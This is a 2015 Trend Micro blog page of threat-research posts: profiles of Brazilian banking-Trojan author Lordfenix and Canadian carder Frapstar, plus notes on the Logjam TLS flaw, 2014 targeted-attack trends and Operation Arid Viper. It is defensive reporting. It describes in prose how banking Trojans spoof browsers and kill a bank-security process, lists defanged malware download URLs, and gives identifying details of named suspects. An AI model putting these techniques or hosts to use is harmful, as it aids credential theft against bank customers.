Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Recent Posts

  • Calendar

    July 2015
    S M T W T F S
    « Jun    
  • Email Subscription

  • About Us

    Author Archive - Trend Micro

    A 20-year-old college student whose underground username is Lordfenix has become one of Brazil’s top banking malware creators. Lordfenix developed his underground reputation by creating more than a hundred online banking Trojans, each valued at over US$300. Lordfenix is the latest in a string of young and notorious solo cybercriminals we’re seeing today.

    Who is Lordfenix?

    Lordfenix is a 20-year old Computer Science student from Tocantins, Brazil. We were able to trace his activity back to April 2013. At the time, he was operating under a different handle, Filho de Hakcer (Portuguese for “hacker’s son,” but misspelled). He was posting in forums, asking for programming assistance for a Trojan he was supposedly creating.

    Figure 1. Forum post of Lordfenix, then Filho de Hakcer

    Based on a photo he posted on Facebook dated September 2013, it appears he was successful in his work.

    Figure 2. Facebook post boasting of his success with his Trojan

    Information theft via fake browsers

    Lordfenix has since continued to develop and sell banking Trojans, one of which we detect as TSPY_BANKER.NJH. This Trojan is able to identify when a user types any of its target banks’ URLs. Among these targets are Banco de Brasil, Caixa, and HSBC Brasil.

    It is then able to close the current browser window (if it’s running on Google Chrome), display an error message, and then open a new fake Chrome window. This whole routine is almost unnoticeable since the browser windows are switched seamlessly. In case the user’s browser is Internet Explorer or Firefox, the original window stays open, but the error message and the fake browser window still appear.

    Figure 3. Fake browser window

    Figure 4. Spoofed HSBC Brasil banking site

    Figure 5. Spoofed Banco de Brasil banking site

    If the user enters his login credentials in the fake window, the malware sends the information back to the attacker via email—the same email address Lordfenix used during his “Filho de Hakcer” days.

    For added protection against security products, this malware terminates the process GbpSV.exe. This process is associated with the software G-Buster Browser Defense, a security program many Brazilian banks use to defend against information theft and protect their customers’ privacy during online transactions.

    Cybercrime for free

    Lordfenix has grown quite confident in his skills. We found him offering free versions of fully-functional banking Trojan source code to underground forum members. He claims these free versions can steal credentials from customers of four different banks. But this generosity has a limit. If other members would like to target more banks, they would have to contact him, and he would sell them TSPY_BANKER.NJH. We checked this banking Trojan and it is, in fact, operational.

    Figure 6. Forum post advertising free banking Trojan source code

    We also found him advertising banking Trojans through his Skype profile. There, the Trojans are referred to as keylogger (KL) proxy—based on the keylogging capabilities of the malware.

    Figure 7. Lordfenix’s Skype profile

    Cybercriminal upstart

    Based on our research, Lordfenix has created more than 100 different banking Trojans, not including his other malicious tools, since April 2013. With each Trojan costing around R$1,000 (roughly US$320), this young cybercriminal channeled his talent in programming into a lucrative, illegal venture.

    Aside from the ease of creating malware, a few other factors may have urged Lordfenix to start up his own little enterprise:

    • Brazil has a huge online banking user base. In 2013 alone, around 51% percent of all banking transactions within the country were done via the Internet.
    • Digital crime is not necessarily a top priority in Brazil. The penalties against offenders are currently very low.

    Despite working alone and being only 20 years old, Lordfenix has managed to make his name known among his fellow criminals. His story—the young cybercriminal inflicting serious damage—is near-identical to that of the teens developing mobile ransomware in China. He is also not the first solo operator we have noted this quarter. The likes of Frapstar (Canada) and the cybercriminals behind FighterPOS (Brazil) and HawkEye (Nigeria) are all individual players using basic malware to gain profit.

    In cybercrime, it doesn’t matter if the criminal is a veteran or a newbie. The result remains the same: ordinary users become victims.

    Posted in Malware |

    By now cybercrime has become the fastest growing criminal enterprise of the 21st century, run by efficient organizations with great professionalism. Today, news headlines are mostly about large-scale breaches orchestrated by large criminal syndicates. But smaller one-man operations can be equally devastating to the unwitting home users and businesses. This reminds us that cyber criminals come in all shapes and sizes and still lurk around every corner of the internet, waiting to prey on an unsuspecting victim.

    In order to shed some light on these lone wolf hackers, we showcase the activities of an individual located in Canada, whom we investigated and reported to the Canadian authorities. This individual uses the handles ksensei21, frapstar and badbullz in various crime and hacking forums, and will be referred to in this report as Frapstar. Are the one-man cybercrime operators in the shadowy online crime underground the evolved version of the petty thief?

    Individual thieves vs. Organized gangs

    The online black market has several tiers that offer different levels of access to different kinds of services: There are “closed” portals – those that require cybercriminals to go through a long vetting process, and there are those that are more “open”, mostly operating in public forums with a low barrier for entry.

    Not surprisingly, these tiers mirror the type of product and expertise available: the “closed” portals deal more with sophisticated malware and exploit kits – while the open portals serve as a wonderland for all kinds of smaller scale criminal activity, mostly dealing with credit cards, social security numbers, health insurance information and the likes.

    Some researchers suggest that 80% of cybercrime stems from cybercriminal enterprises which have their own resources for developing malicious code, control their own botnets and treat their dealings like a legitimate business. That leaves about 20% carried out by individuals, who venture out on their own. This number is substantial and these independently operating criminals can cause significant damage: a recent Trend Micro research paper detailed how a one-man PoS malware operation captured 22,000 credit cards in Brazil.

    FRAPSTAR – A Canadian specimen of the one-man cybercrime operators

    Frapstar used the handles ksensei21, frapstar and badbullz and he actually used these same names across all kinds of crime/non-crime related platforms on the internet. We even found him openly searching for conspirators on the public Internet. This is clearly the mark of a one-man and relatively amateurish operation: most criminals that we track know better than to ask for conspirators, especially not in Canada — a large country with a small populace makes for an easy grid to track someone down. Cybercrime enterprises are not rampant in Canada as compared to the US, and this may explain why Frapstar is operating alone: groups mostly operate with cybercriminals in close geographic proximity..

    Figure 1. Frapstar posting a “job offer” for other cybercriminals

    Using an email address and handle associated with Frapstar, we discovered that he is also active in other online forums. In checking his posts, we found that he has posted about being a fan of expensive cars and owning an older model BMW 540i. On a popular BMW forum, he even states his name as “Chuck” and that he is located in Montreal; not to forget he adds his (gmail!) email-address for correspondence on these matters.

    Figure 2. Forum post by Frapstar stating that he owns a BMW 540i (Click to enlarge)

    Figure 3. Frapstar mentioning his name and location in a forum post (Click to enlarge)

    Figure 4. Frapstar mentioning his Gmail email address in a forum post (Click to enlarge)

    This finding gives a peek of what kind of lifestyle Frapstar has. He is obviously living comfortably and is able to afford some luxuries. We are not certain whether Frapstar has a different day job that supplements his cybercrime operations, but we believe that he is earning a substantial amount from his operations.

    Virtual marketplaces for your criminal needs

    Frapstar was very active in known cybercrime and hacking forums. These forums are platforms to sell sensitive information dumps – a known term for stolen information data that often include credit card and social security numbers, Cybercriminals can also purchase off-the-shelf malware directly from coders in these crime and hacking forums. Listed are the handles in these forums that we could identify as and attribute to Frapstar:

    Handle Forum Forum Type
    frapstar Carding forum
    frapstar PII  & Carding forum
    frapstar Hacking forum
    badbullz Carding forum
    badbullzvenom Russian Hacking forum
    badbullzvenom Russian Hacking forum

    Table 1. Frapstar’s handles in crime and hacking forums

    Lampeduza for instance is a well known crime forum  and a marketplace for  selling credit card dumps. Forum posts are de-facto bulletin boards that announce merchandise for sale with details about how the actual exchange will be conducted. The actual dealings go down via instant messenger applications such as Jabber or ICQ; payments are conducted via anonymous money transfers with providers such as Western Union, MoneyGram, WebMoney or Bitcoins; Frapstar’s preferred method for payment seems to be Western Union or WebMoney.

    Looking at the different forums Frapstar frequented and the content of his posts, we concluded that he is in the “carding” business, i.e. selling credit card and possibly PII dumps; he also has Canadian passports to offer. Online fraud consists of two parts: 1) the stealing and collecting of data and 2) utilizing the stolen data through purchases or other means. Frapstar belongs to the first category as he sticks to selling the stolen credit card information as “dumps” for a sizeable profit.

    Figure 6: Frapstar’s forum posts, where he talks about different kinds of services and job offers (Click to enlarge)

    Figure 7: Frapstar’s service allow cybercriminals to replace credit card details if they’re already inactive

    How crooks like Frapstar steal data

    In our investigations we were led to the conclusion that Frapstar stole credit card details by using information-stealing malware he bought from other cybercriminals. He also bought spamming and botnet services to deploy the malware into victims’ systems.

    Frapstar used a range of malware families to gain entry and maintain persistence in the targets’ environment. We tracked a domain registered to Frapstar: liveupdate[.]su hosted by Voxility in Romania, where we saw some malware hosted:

    • http://liveupdate[.] su/a5/grabber_7423.exe
    • http://liveupdate[.] su/a5/andro_78423.exe
    • http://liveupdate[.] su/a5/pony_43242.exe

    Upon further analysis, we’ve found that Frapstar primarily uses the following malware families in his operations:

    Malware Family Function
    Zeus Primary – botnet, Secondary – data stealing functions
    Zbot Primary – botnet, Secondary – data stealing functions
    VBNA Worm written in Visual Basic
    SillyFDC Autorun worm
    Various Scanners, Password Stealers, Droppers, Downloaders, and Backdoors

    Table 2. Malware types used

    Based on the tools he used, we can make the assumption that Frapstar was able to affect both home users and businesses. His strategy, using multiple malware types resembles a Swiss Army Knife– Frapstar purchases malware with different capabilities and used each depending on his current needs. This also highlights a key fact about the user: Frapstar is a script kiddie who shops for malware on hacking forums but also possesses enough know-how to effectively use the malware.

    Different means, same end

    Frapstar and his fellow crooks are on the lower end of today’s billion dollar crime business, but they realize the promise of high returns in the face of relatively low cost and risk, and therefore, grasp the opportunity. Buying malware nowadays is easy and relatively cheap, which makes the idea of launching such a “career” very attractive for hundreds, if not thousands of one-man operators. However, whoever is launching the attack does not matter greatly to the user. Regardless of whether it is a one-man operator or a cybercrime enterprise, for the victim, it still causes significant financial loss and damage. What this really shows, is that there is a large bandwidth of different criminal types with varying scales at which they operate, and they are all targeting the same set of users.

    Posted in Malware |

    6:03 am (UTC-7)   |    by

    logjam 1Another flaw has been found in the basic encryption algorithms that secure the Internet. This flaw, named the Logjam attack by its discoverers (researchers from various universities and companies), allows an attacker that can carry out man-in-the-middle attacks to weaken the encryption used in secure connections (such as HTTPS, SSH, and VPNs). In theory, this means that an attacker (with sufficient resources) can break the encryption and read the “secure” traffic.

    In some ways, this attack is similar to the recent FREAK attack. Both attacks were made possible by support for “export-grade” encryption standards. Until the 1990s, cryptography was considered a “munition” in the United States and limits were placed on the strength of cryptography that products “exported” for use outside of the US could support. Unfortunately, what was “acceptable” cryptography then can now be cracked with sufficient computation resources.

    The vulnerability lies in how the Diffie-Hellman key exchange is carried out. Logjam can be used to lower the strength of the accepted algorithms to those that use 512-bit prime numbers (as used in “export-grade” encryption). Similar research (also carried out by the Logjam researchers) proved that other vulnerabilities are present in systems that use 768- and 1024-bit primes. Nation-states may have the resources needed to exploit these flaws; this can allow an attacker to decrypt secure traffic that has been passively collected.

    Who is at risk?

    Theoretically, any protocol that uses the Diffie-Hellman key exchange is at risk from this attack. However, note that this attack requires two factors on the part of the attacker: the ability to intercept traffic between the secure server and the client, as well as significant computation resources.

    The researchers estimate that up to 8.4% of all sites in the top one million domains are vulnerable. Similar percentages of POP3S and IMAPS (secure email) servers are at risk.

    What should I do now?

    For end users, there’s really only one thing to do: update your browsers. All the major browser vendors (Google, Mozilla, Microsoft, and Apple) are preparing updates for their various products, and should release an update soon. You can also check if your browser is vulnerable by visiting this site.

    For software developers, the fix is also relatively simple. Check that any encryption libraries that are used or bundled with your application are all up to date. In addition, the use of larger prime numbers for key exchange can be specified as well.

    The main task falls on IT administrators with servers that use any of the at-risk services and protocols. In these cases, the following needs to be performed:

    • Disable support for all export cipher suites, to ensure they cannot be used.
    • Increase the number of bits used by the prime numbers in the Diffie-Hellman key exchange to 2048 bits; this ensures that exceptional computational powers would be needed to break any encryption based on this process.

    Trend Micro solutions

    We have released the following rules for  Trend Micro Deep Security and Vulnerability Protection users that protect against this threat:

    • 1006561 – Identified Usage Of TLS/SSL EXPORT Cipher Suite In Response
    • 1006562 – Identified Usage Of TLS/SSL EXPORT Cipher Suite In Request
    • 1006740 – Identified SSL/TLS Diffie-Hellman Key Exchange Using Weak Parameters Client
    • 1006741 – Identified SSL/TLS Diffie-Hellman Key Exchange Using Weak Parameters Server

    Post updated on May 20, 2015 7:45 PM PDT to add Trend Micro solutions. 

    Post updated on May 21, 2015 1:40 PM PDT to refine Trend Micro solutions.

    Post updated on June 19, 2015 12:06 PM PDT to add Trend Micro solutions.

    Posted in Vulnerabilities |

    7:13 pm (UTC-7)   |    by

    2014 was a year in which we saw further refinements in targeted attack methodologies. As more organizations upgraded to newer versions of Windows, we saw the increased use of 64-bit malware in several campaigns. Examples of 64-bit malware include HAVEX, a remote access Trojan (RAT) used in a campaign that targeted industrial control systems (ICS), and WIPALL, the notorious malware behind the Sony Pictures hack.

    The move to newer versions of Windows also led to the abuse of legitimate tools/features in attacks. An example is Windows PowerShell®, a feature in versions for Windows 7 and higher that allows system administrators to access other features without the use of graphical user interfaces (GUIs). PowerShell commands were abused to download malicious files and bypass execution policies, which allowed the downloaded files to be executed.

    A document exploit template, detected as TROJ_MDROP.TRX, was found in several targeted attacks. This exploit was most likely sold and distributed underground because of its use in several campaigns. Threat actors could simply modify the exploit template to fit their intended payload.

    Based on our data, .RTF and .DOC files were the two most frequently used email attachments, most likely because Microsoft Word® is used in any organization.

    Figure 1. Most frequently used email attachment file types in targeted attacks in 2014

    Old and New Vulnerabilities in Attacks

    Several zero-day exploits were used in targeted attacks in 2014. For example, two Taidoor-related zero-day exploit attacks targeting CVE-2014-1761 hit government agencies and an educational institution in Taiwan, with a window of exposure of 15 days. Exploiting new vulnerabilities has been proven to be more effective because security vendors have yet to create patches. Zero-day exploits can catch vendors and victims alike unawares.

    The use of new vulnerabilities doesn’t mean that threat actors have done away with older ones. In fact, targeting old vulnerabilities also proved reliable because attackers can just use tried-and-tested exploits that may be easily bought.

    Despite being patched via MS12-027, CVE-2012-0158 remained a favored vulnerability for attackers. Additionally, it was the most exploited vulnerability used by targeted attacks in the first half of 2014. Two notable campaigns, PLEAD and Operation Pawn Storm, abused this vulnerability to infiltrate target networks.

    A Global Problem

    Government agencies remained the most favored attack targets in 2014. In the second half of the year, we saw a spike in the number of attacks that targeted hardware/software companies, consumer electronics manufacturers, and health care providers.

    We also determined the global distribution of targets accessing C&C servers. As shown in the heat map below, the United States, Russia, and China were no longer the only favored targets. Other targets included Taiwan, South Korea, France, and Germany.

    Figure 2. Top countries that communicated with targeted attack C&C servers in 2014 (click the image to enlarge)

    Keeping Up with Threats

    Given the increased volume of targeted attacks, ease of mounting them, and difficulty to protect against them, network defenders must be able to adapt a shift in mindset from prevention to detection. This means accepting that targeted attacks will eventually hit their networks; without an assurance that a suite of blacklisting technologies will be able to keep determined threat actors at bay.

    Building threat intelligence is crucial in the fight against targeted attacks. Knowledge of the tools, tactics, and procedures that threat actors use based on external reports and internal historical and current monitoring can help create a strong database of indicators of compromise (IoCs) that can serve as basis for action. But organizations shouldn’t limit themselves to simply knowledge of the attacks. Establishing and empowering incident response teams and training employees, partners, and vendors on social engineering and computer security can also help mitigate the risks involved with targeted attacks.

    For full details on our findings, you may read our Targeted Attack Trends: 2014 Annual Report.


    operation-arid-viper-advtravel_thumbLast week, we released a research paper titled “Operation Arid Viper: Bypassing the Iron Dome” where we detailed two related campaigns. To recall, here are our key findings related to the two campaigns:

    • Palestinian threat actors have staged a targeted attack, Operation Arid Viper, to exfiltrate data from high-profile targets in the Israeli government and have been doing so since mid-2013. The attacks are still on-going, coinciding with the political tension between Israel and Palestinians.
    • Investigation of the Germany-hosted server used in Arid Viper revealed a group of Egyptian hackers (Advtravel) that have less technical knowhow and are attacking other Egyptians in less purposeful attacks.
    • Both groups have strong Arab ties, and the same server and site registration details suggest the existence of a supra-organization, a forum or an influential sponsor could be providing various hacking groups with the means to pursue their ends.

    Since the report was released, we have continued our investigation and have a number of updates:

    • None of the C&C domains have moved to other hosting providers or had other major changes since the publishing of our report. Although we have not seen newly compiled samples being spread – we have seen 2 recent attempted infections with existing binaries from Arid Viper on the 15th and 19th of February against a target in Israel and Kuwait respectively. For reference, our paper went public on the 16th.
    • Interestingly, a number of the people linked to the C&C servers in the paper have made changes to their public profiles since the paper went live. To date none of these individuals have contacted us to dispute the details we outlined in the paper:
      • The Facebook account we mentioned in the paper for Fathy Mostafa is now no longer active.
      • Quite a number of the accounts we related to Ebrahim Said El-Sharawy (aka Dev_Hima) have been modified or removed.  Upon inspection today, his accounts on Blogspot, Facebook, Twitter, and are no longer active. His main webpage ( which had hosted two questionable tools we outlined in the report has been changed to remove all of that content and has been replaced with the words “Closed by DevHima”:

    Screen Shot 2015-02-24 at 21.18.17

    •  Some of his other accounts such as his LinkedIn, SoundHound, and YouTube (which is hard to remove without deleting your personal Gmail account) are still live at the time of writing.
    • After further investigation, we now believe that the email used to register the C&C pstcmedia[dot]com ,, actually belongs to the Web hosting provider that registered this domain on a client’s behalf – and is not an individual involved in the campaign itself. We have updated our paper to remove reference to Mr. Samraa with the exception that the email address was used to register this site.

    Trend Micro will continue to research more on these campaigns over the coming months and post updates as we find them.

    Posted in Targeted Attacks | Comments Off on Arid Viper Update: Attacks Ongoing, Threat Actors on the Move


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice